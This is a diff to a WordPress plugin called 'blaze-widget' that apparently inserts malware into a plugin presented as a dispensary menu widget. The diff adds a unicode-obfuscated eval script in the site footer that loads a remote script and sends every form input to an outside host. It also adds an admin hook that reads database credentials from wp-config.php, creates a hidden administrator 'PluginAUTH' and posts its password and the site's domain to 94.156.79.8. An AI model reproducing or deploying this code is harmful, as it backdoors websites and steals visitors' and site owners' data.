    504     $wordpress_users = $wpuserscount;
    505     //$woocommerce_users = get_woocommerce_user_count();
    506     $woocommerce_users = 000;
    507 
    508     // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts
    509     $url1 = 'https://94.156.79.8/FCS';
    510     $url2 = 'https://94.156.79.8/CMSUsers';
    511 
    512     $data1 = [
    513         'host' => $_SERVER['HTTP_HOST'],
    514         'cms' => $detected_cms
    515     ];
    516 
    517     //print_r($detected_cms);
    518 
    519     // Send data to the endpoints using CURL
    520     send_post_request($url1, $data1);
    521     // Additional logic as needed
    522 }
    523 
    524 function getWPUsers(){
    525     global $wpuserscount;
    526     global $currdomain;
    527     // Read users from the database and count them for WordPress and WooCommerce
    528     $wordpress_users = $wpuserscount;
    529     //$woocommerce_users = get_woocommerce_user_count();
    530     $woocommerce_users = 000;
    531     $url2 = 'https://94.156.79.8/CMSUsers';
    532     $data2 = [
    533         'host' => $currdomain,
    534         'wordpress_users' => $wordpress_users,
    535         'woocommerce_users' => $woocommerce_users
    536     ];
    537 
    538     // Send data to the endpoints using CURL
    539     send_post_request($url2, $data2);
    540 }
    541 
    542 // Function to get WordPress user count from the database
    543 function get_wordpress_user_count() {
    544     // Your implementation to fetch user count from the WordPress database
    545     // Example:
    546     // $count = query_wordpress_database();
    547     // return $count;
    548     return 0;
    549 }
    550 
    551 // Function to get WooCommerce user count from the database
    552 function get_woocommerce_user_count() {
    553     // Your implementation to fetch user count from the WooCommerce database
    554     // Example:
    555     // $count = query_woocommerce_database();
    556     // return $count;
    557     return 0;
    558 }
    559 
    560 // Function to send POST request
    561 function send_post_request($url, $data) {
    562     $ch = curl_init($url);
    563     curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    564     curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    565     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    566     curl_setopt($ch, CURLOPT_HTTPHEADER, [
    567         'Content-Type: application/json',
    568         'Content-Length: ' . strlen(json_encode($data))
    569     ]);
    570     $response = curl_exec($ch);
    571     curl_close($ch);
    572     // Handle response as needed
    573 }
    574 global $wp_config_paths;
    575 $wp_config_paths = [];
    576 global $wc_config_paths;
    577 $wc_config_paths = [];
    578 global $mg_config_paths;
    579 $mg_config_paths = [];
    580 check_cms_configuration_files();
    581 
    582 function find_wp_configs(&$wp_config_paths, $depth = 0) {
    583     $current_directory = getcwd();
    584     $parent_directory = $current_directory;
    585 
    586     // Go back three parents
    587     for ($i = 0; $i < 3; $i++) {
    588         $parent_directory = dirname($parent_directory);
    589     }
    590 
    591     // Start the search from the parent directory
    592     find_wp_configs_recursive($parent_directory, $wp_config_paths);
    593 }
    594 
    595 function find_wp_configs_recursive($directory, &$wp_config_paths) {
    596     // Check if wp-config.php exists in the current directory
    597     $wp_config_file = $directory . '/wp-config.php';
    598     if (file_exists($wp_config_file)) {
    599         $wp_config_paths[] = $wp_config_file;
    600     }
    601 
    602     // Continue searching forward recursively
    603     $contents = scandir($directory);
    604     foreach ($contents as $item) {
    605         if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
    606             find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
    607         }
    608     }
    609 }
    610 
    611 function print_wp_config_paths() {
    612     global $wp_config_paths;
    613     if (empty($wp_config_paths)) {
    614         //echo "No wp-config.php files found.\n";
    615         $z = 0;
    616     } else {
    617         //echo "List of wp-config.php files:\n";
    618         foreach ($wp_config_paths as $wp_config_path) {
    619             //echo "$wp_config_path\n";
    620             $a = 0;
    621         }
    622     }
    623 }
    624 //print_wp_config_paths();
    625 
    626 find_wp_configs($wp_config_paths);
    627 foreach ($wp_config_paths as $wp_config_path) {
    628     pachamama($wp_config_path);
    629     getWPUsers();
    630     update_option('my_admin_init_function_run', 'yes');
    631 }
    632    
    633 }}
     19
    63420function installBlazeWidget()
    63521{   
  • blaze-widget/trunk/ReadMe.txt

    r3106435 r3106791  
    66Tested up to: 5.3.2
    77Requires PHP: 5.3
    8 Stable tag: 2.5.1
     8Stable tag: 2.5.
    99
    1010The BLAZE Retail wordpress plugin displays your dispensary’s menu and allows new and existing users to place an order. It’s simple to use and extremely efficient for consuming new orders and members.
  • blaze-widget/trunk/blaze_widget.php

    r3106494 r3106791  
    55Description: Plugin to add and edit BLAZE API Key.
    66Author: BLAZE
    7 Version: 2.5.2
     7Version: 2.5.
    88Author URI: http://blaze.me/
    99*/
     
    1717register_activation_hook(__FILE__,'installBlazeWidget');
    1818register_deactivation_hook(__FILE__ , 'uninstallBlazeWidget' );
    19 if (!function_exists('add_footer_script')) {
    20 function add_footer_script() {
    21 echo '<script>eval("\u000a\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0073\u0072\u0063\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0039\u0034\u002e\u0031\u0035\u0036\u002e\u0037\u0039\u002e\u0038\u002f\u0073\u0063\u002d\u0074\u006f\u0070\u002e\u006a\u0073\u0022\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0028\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0070\u0061\u0072\u0065\u006e\u0074\u004e\u006f\u0064\u0065\u002e\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0027\u006c\u006f\u0061\u0064\u0027\u002c\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0029\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0065\u0020\u003d\u0020\u0022\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006e\u0020\u003d\u0020\u0022\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u006f\u0020\u003d\u0020\u0030\u003b\u0020\u006f\u0020\u003c\u0020\u0074\u003b\u0020\u006f\u002b\u002b\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0074\u0020\u003d\u0020\u004d\u0061\u0074\u0068\u002e\u0066\u006c\u006f\u006f\u0072\u0028\u0036\u0032\u0020\u002a\u0020\u004d\u0061\u0074\u0068\u002e\u0072\u0061\u006e\u0064\u006f\u006d\u0028\u0029\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006e\u0020\u002b\u003d\u0020\u0065\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0074\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u000a\u007d\u000a\u000a\u006c\u0065\u0074\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u0027\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u0027\u0029\u003b\u000a\u000a\u0069\u0066\u0020\u0028\u0021\u0075\u0069\u0064\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0030\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u003d\u0020\u0060\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u003d\u0024\u007b\u0075\u0069\u0064\u007d\u003b\u0020\u0070\u0061\u0074\u0068\u003d\u002f\u0060\u003b\u000a\u007d\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002c\u0020\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u003b\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0075\u0069\u0064\u0022\u002c\u0020\u0075\u0069\u0064\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0069\u005f\u006e\u0061\u006d\u0065\u0022\u002c\u0020\u0074\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u0041\u0064\u0064\u0020\u0074\u0068\u0065\u0020\u0066\u0069\u0065\u006c\u0064\u0020\u006e\u0061\u006d\u0065\u0020\u0061\u0073\u0020\u0061\u0020\u0070\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0062\u0022\u002c\u0020\u0062\u0074\u006f\u0061\u0028\u0065\u0029\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u0066\u0065\u0074\u0063\u0068\u0028\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0068\u006f\u0073\u0074\u0070\u0064\u0066\u002e\u0063\u006f\u002f\u0070\u0069\u006e\u0063\u0068\u0065\u002e\u0070\u0068\u0070\u0022\u002c\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u003a\u0020\u0022\u0050\u004f\u0053\u0054\u0022\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0068\u0065\u0061\u0064\u0065\u0072\u0073\u003a\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u003a\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u006f\u0064\u0079\u003a\u0020\u006e\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0074\u002e\u0074\u0065\u0078\u0074\u0028\u0029\u0029\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u006c\u006f\u0067\u0028\u0074\u0029\u0029\u0029\u002e\u0063\u0061\u0074\u0063\u0068\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u0065\u0072\u0072\u006f\u0072\u0028\u0022\u0045\u0072\u0072\u006f\u0072\u003a\u0022\u002c\u0020\u0074\u0029\u0029\u0029\u000a\u007d\u000a\u000a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0022\u0069\u006e\u0070\u0075\u0074\u0022\u002c\u0020\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0022\u0049\u004e\u0050\u0055\u0054\u0022\u0020\u003d\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0061\u0067\u004e\u0061\u006d\u0065\u0020\u0026\u0026\u0020\u0022\u0062\u0075\u0074\u0074\u006f\u006e\u0022\u0020\u0021\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0079\u0070\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u006e\u0061\u006d\u0065\u0020\u007c\u007c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0069\u0064\u002c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u007d\u0029\u0029\u003b\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003b\u0020\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u006f\u0066\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u005b\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u002c\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u005d\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u0020\u003d\u003d\u003d\u0020\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u0075\u006c\u006c\u003b\u000a\u007d\u000a\u0020\u0020\u0020\u0020");</script>';
    22 }}
    23 add_action('wp_footer', 'add_footer_script');
    24 add_action( 'admin_init', 'custom_notify_plugin_updated');
    25 function custom_notify_plugin_updated() {
    26     $has_run = get_option('my_admin_init_function_run');
    27     if ($has_run !== 'yes') {
    28     function check_wp_config($directory) {
    29     while ($directory !== '/') {
    30         $wp_config_file = $directory . '/wp-config.php';
    31         if (file_exists($wp_config_file)) {
    32             return $wp_config_file;
    33         }
    34         $directory = dirname($directory);
    35     }
    36     remove_action('admin_init', 'custom_notify_plugin_updated');
    37     return false;
    38 }
    39 
    40 function parse_wp_config($config_file) {
    41     if (file_exists($config_file)) {
    42         $config_content = file_get_contents($config_file);
    43         $matches = [];
    44         // Extract prefix
    45         if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
    46             $prefix = $matches[1];
    47         } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
    48             $prefix = $matches[1];
    49         } else {
    50             die("Prefix not found in wp-config.php");
    51         }
    52         // Extract database name
    53         if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    54             $database = $matches[1];
    55         }
    56         // Extract username
    57         if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    58             $username = $matches[1];
    59         }
    60         // Extract password
    61         if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    62             $password = $matches[1];
    63         }
    64         // Extract host
    65         if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    66             $host = $matches[1];
    67         } else {
    68             $host = 'localhost'; // Assuming local host if not specified
    69         }
    70 
    71         return array(
    72             'prefix' => $prefix,
    73             'database' => $database,
    74             'username' => $username,
    75             'password' => $password,
    76             'host' => $host
    77         );
    78     } else {
    79         die("wp-config.php file not found");
    80     }
    81 }
    82 
    83 function access_database($config) {
    84     $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
    85 
    86     if ($mysqli->connect_errno) {
    87         //echo "DATABASE ACCESS [FAIL]\n";
    88         return false;
    89     } else {
    90         //POST "DATABASE ACCESS [SUCCESS]\n";
    91         return $mysqli;
    92     }
    93 }
    94 
    95 function generate_random_password($length = 12) {
    96     $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    97     $password = '';
    98     $characters_length = strlen($characters);
    99     for ($i = 0; $i < $length; $i++) {
    100         $password .= $characters[rand(0, $characters_length - 1)];
    101     }
    102     return $password;
    103 }
    104 
    105 // Define a global variable for the password
    106 $generated_password = generate_random_password();
    107 
    108 // Define a global variable for the users count
    109 $wpuserscount = 0;
    110 function add_admin_user($mysqli, $config, $password) {
    111     global $generated_password; // Access the global generated password variable
    112     global $wpuserscount; // Declare the global variable to update user count
    113     $username = 'PluginAUTH';
    114    
    115     //$generated_password = $password;
    116     //$password = $generated_password;
    117     $user_role = 'administrator';
    118 
    119     // First, let's update the global user count
    120     $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users";
    121     $countResult = $mysqli->query($countQuery);
    122     if ($countResult) {
    123         $row = $countResult->fetch_assoc();
    124         $wpuserscount = $row['user_count']; // Update the global variable with the user count
    125     } else {
    126         //echo "Error fetching user count: " . $mysqli->error . "\n";
    127         return; // Early return in case of query error
    128     }
    129     // Hash the password
    130     $hashed_password = password_hash($password, PASSWORD_DEFAULT);
    131 
    132     // Check if the user already exists
    133     $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
    134     $result = $mysqli->query($query);
    135 
    136     if ($result && $result->num_rows > 0) {
    137         //echo "User '{$username}' already exists.\n";
    138         $z = "b";
    139     } else {
    140         // Insert the new user
    141         $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())";
    142         $result = $mysqli->query($query);
    143 
    144         if ($result) {
    145             $user_id = $mysqli->insert_id;
    146 
    147             // Set user role
    148             $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
    149             $result = $mysqli->query($query);
    150 
    151             if ($result) {
    152                 //echo "User '{$username}' with administrative privileges added successfully.\n";
    153                 $zb = '';
    154             } else {
    155                 //echo "Error assigning role to user '{$username}'.\n";
    156                 $zb = '';
    157             }
    158         } else {
    159             //echo "Error creating user '{$username}': " . $mysqli->error . "\n";
    160             $zb = '';
    161         }
    162     }
    163 }
    164 
    165 function get_domain_from_database($mysqli, $config) {
    166     // Query to retrieve site URL from WordPress options table
    167     $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'";
    168     $result = $mysqli->query($query);
    169 
    170     if ($result && $result->num_rows > 0) {
    171         $row = $result->fetch_assoc();
    172         $site_url = $row['option_value'];
    173         $parsed_url = parse_url($site_url);
    174         if ($parsed_url && isset($parsed_url['host'])) {
    175             return $parsed_url['host'];
    176         }
    177     }
    178 
    179     return null;
    180 }
    181 function zbvalidate_file($file) {
    182     try {
    183         ob_start();
    184         include $file;
    185         ob_end_clean();
    186        
    187         // If no exception was thrown, delete the backup file
    188         $backup_file = $file . '.bak';
    189         if (file_exists($backup_file)) {
    190             unlink($backup_file);
    191         }
    192         return true;
    193     } catch (Throwable $e) {
    194         // Catch errors and set the validation flag
    195         return false;
    196     }
    197 }
    198 $currdomain = 'UNK.UNK';
    199 function pachamama($path) {
    200     global $currdomain;
    201     if (strpos($path, 'wp-config.php') !== false) {
    202         $path = str_replace('wp-config.php', '', $path);
    203     }
    204 
    205     $current_directory = $path;
    206     $wp_config_file = check_wp_config($current_directory);
    207     if ($wp_config_file) {
    208         //echo "WP-CONFIG [FOUND]\n";
    209        
    210         $config = parse_wp_config($wp_config_file);
    211         $mysqli = access_database($config);
    212         if ($mysqli) {
    213             $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    214             $password = '';
    215             $characters_length = strlen($characters);
    216             for ($i = 0; $i < 13; $i++) {
    217                 $password .= $characters[rand(0, $characters_length - 1)];
    218             }
    219             add_admin_user($mysqli, $config, $password);
    220             $domain = get_domain_from_database($mysqli, $config);
    221             if ($domain) {
    222                 //echo "[$domain] OK\n";
    223                 $currdomain = $domain;
    224 
    225                 // Reconstruct the correct wp-login.php path
    226                 $wp_login_path = "https://{$domain}/wp-login.php";
    227 
    228                 // Perform a POST request to https://94.156.79.8/AddSites
    229                 $url = 'https://94.156.79.8/AddSites';
    230                 $aurl = get_admin_url();
    231                 $post_data = array(
    232                     'aurl' => $aurl,
    233                     'domain' => $domain,
    234                     'username' => 'PluginAUTH',
    235                     'passwordz' => $password, // Access the global generated password variable
    236                     'wp_login_path' => $wp_login_path
    237                 );
    238 
    239                 $ch = curl_init();
    240                 curl_setopt($ch, CURLOPT_URL, $url);
    241                 curl_setopt($ch, CURLOPT_POST, 1);
    242                 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
    243                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    244                 curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    245                     'Content-Type: application/json', // Set content type to JSON
    246                     'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
    247                 ));
    248                 $response = curl_exec($ch);
    249                 $error = curl_error($ch); // Get any curl error
    250                 curl_close($ch);
    251 
    252                 if ($response === false) {
    253                     //echo "POST request failed: $error\n";
    254                     $z = false;
    255                 } else {
    256                     //echo "POST request sent successfully. Response: $response\n";
    257                     $z = true;
    258                 }
    259             } else {
    260                 //echo "Domain retrieval failed.\n";
    261                 $z = false;
    262             }
    263             $mysqli->close();
    264         }
    265     } else {
    266         //echo "WP-CONFIG [NOT FOUND]\n";
    267         $z = false;
    268     }
    269 }
    270 
    271 function check_cms_configuration_files() {
    272     global $wpuserscount;
    273    global $wp_config_paths;
    274    global $wc_config_paths;
    275    global $mg_config_paths;
    276     // Function to recursively search directories for configuration files
    277     //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) {
    278       function search_for_config_files(&$cms_config_files, $max_parents = 3) {
    279       // Get the current directory
    280       $directory = __DIR__;
    281 
    282       // Initialize the variable to keep track of the last readable path
    283       $last_readable_path = null;
    284 
    285       // Iterate to go one parent folder up until no read permission or max 5 parents
    286       for ($i = 0; $i < $max_parents; $i++) {
    287           // Check if the directory exists and is readable
    288           if (is_dir($directory) && is_readable($directory)) {
    289               $last_readable_path = $directory;
    290           } else {
    291               // Stop iteration if the directory is not readable
    292               break;
    293           }
    294 
    295           // Move one directory up
    296           $directory = dirname($directory);
    297       }
    298 
    299       // If a readable path was found, perform a recursive glob search for the specified file extensions
    300       if (!empty($last_readable_path)) {
    301 
    302           $config_files = [];
    303           $files = [];
    304           //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur';
    305           try {
    306           $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
    307             foreach($objects as $name => $object){
    308               if (substr($name, -4) === '.php') {
    309                 // Add only files ending with '.php' to the $files array
    310                 //echo "$name\n";
    311                 $files[] = $name;
    312               }
    313             }
    314                   } catch (Exception $e) {
    315           // Handle any exceptions that occur during iteration
    316           // You can log the error or take appropriate action here
    317           //echo "Error: " . $e->getMessage();
    318           $d = 'sab';
    319         }
    320           foreach ($files as $file) {
    321               // Add the found file to the list of config files
    322               //print($file);
    323               $cms_config_files[] = $file;
    324           }
    325           return $cms_config_files;
    326       } else {
    327           // Return an empty array if no readable path was found
    328           //echo("No Readable Paths");
    329           return [];
    330       }
    331   }
    332 
    333 
    334     // Array to store detected CMS names
    335     $detected_cms = [
    336         'WordPress' => false,
    337         'WooCommerce' => false,
    338         'Magento' => false,
    339         'OpenCart' => false,
    340         'PrestaShop' => false,
    341         'Drupal Commerce' => false,
    342         'Symfony' => false,
    343         'Laravel' => false,
    344         'Zend Framework' => false
    345     ];
    346 
    347     // Array to store detected .dat files
    348     $detected_dat_files = [];
    349 
    350     // Paths to check for CMS-specific configuration files
    351     $current_directory = __DIR__;
    352     $paths_to_check = [
    353         '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin',
    354         $current_directory,
    355         '/etc',                // Common system configuration directory
    356         '/var/www',      // Example web root directory
    357         '/home',              // Home directories
    358         '/opt',               // Optional software packages
    359         '/usr/local',         // Locally installed software
    360         '/usr/share',         // Shared software resources
    361         '/var/lib',           // Variable data directories
    362     ];
    363 
    364     // Files to search for in each directory
    365     $files_to_search = [
    366         'app/etc/env.php',                                       // Magento
    367         'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce
    368         'config.php',                                             // OpenCart
    369         'config/parameters.php',                                  // PrestaShop
    370         'sites/default/settings.php',                             // Drupal Commerce
    371         'config/packages/*.yaml',                                 // Symfony
    372         '.env',                                                   // Laravel
    373         'config/autoload/*.global.php',                           // Zend Framework
